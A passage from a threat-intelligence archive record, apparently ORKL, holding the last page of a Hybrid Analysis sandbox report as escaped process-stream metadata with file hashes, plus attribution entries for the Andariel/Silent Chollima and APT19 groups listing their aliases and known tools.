25\n\n00002080\",\"stream_type\":2,\"instructions\":554},\"18347-183-1001ABB2\":{\"uid\":\"18347-183-\r\n1001ABB2\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":500},\"18347-1803-1000C7A9\":{\"uid\":\"18347-1803-\r\n1000C7A9\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":22},\"18347-1223-1003ED9C\":{\"uid\":\"18347-1223-\r\n1003ED9C\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":500},\"18347-1683-10002210\":{\"uid\":\"18347-1683-\r\n10002210\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":25},\"18347-1682-10002600\":{\"uid\":\"18347-1682-\r\n10002600\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":23},\"18347-1809-1000C28E\":{\"uid\":\"18347-1809-\r\n1000C28E\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":54},\"18347-1219-10042F79\":{\"uid\":\"18347-1219-\r\n10042F79\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":589},\"18347-3759-1006C6C8\":{\"uid\":\"18347-3759-\r\n1006C6C8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":468},\"18347-2324-10047D98\":{\"uid\":\"18347-2324-\r\n10047D98\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c54
0a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":489},\"18347-3603-10060E28\":{\"uid\":\"18347-3603-\r\n10060E28\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":483},\"18347-811-1005D6D8\":{\"uid\":\"18347-811-\r\n1005D6D8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":196},\"18347-1875-10017A9C\":{\"uid\":\"18347-1875-\r\n10017A9C\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":186},\"18347-2369-1004F106\":{\"uid\":\"18347-2369-\r\n1004F106\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":499},\"18347-1136-1003D543\":{\"uid\":\"18347-1136-\r\n1003D543\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":494},\"18347-1887-10017160\":{\"uid\":\"18347-1887-\r\n10017160\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":171},\"18347-878-1005EA68\":{\"uid\":\"18347-878-\r\n1005EA68\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":465},\"18347-2716-100136FA\":{\"uid\":\"18347-2716-\r\n100136FA\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":71},\"18347-1725-10001900\":{\"uid\":\"18347-172
5-\r\n10001900\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":82},\"18347-1367-100304A8\":{\"uid\":\"18347-1367-\r\n100304A8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":458},\"18347-827-10064568\":{\"uid\":\"18347-827-\r\n10064568\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":497},\"18347-2097-100282B8\":{\"uid\":\"18347-2097-\r\n100282B8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":192},\"18347-146-10008302\":{\"uid\":\"18347-146-\r\n10008302\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":494},\"18347-798-10065F68\":{\"uid\":\"18347-798-\r\n10065F68\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":428}},\"similar_samples\":true,\"search_button\":true,\"search_button_number_of\":3}\r\nSource: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
	],
	"report_names": [
		"ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434023,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.pdf",
		"text": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.txt",
		"img": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.jpg"
	}
}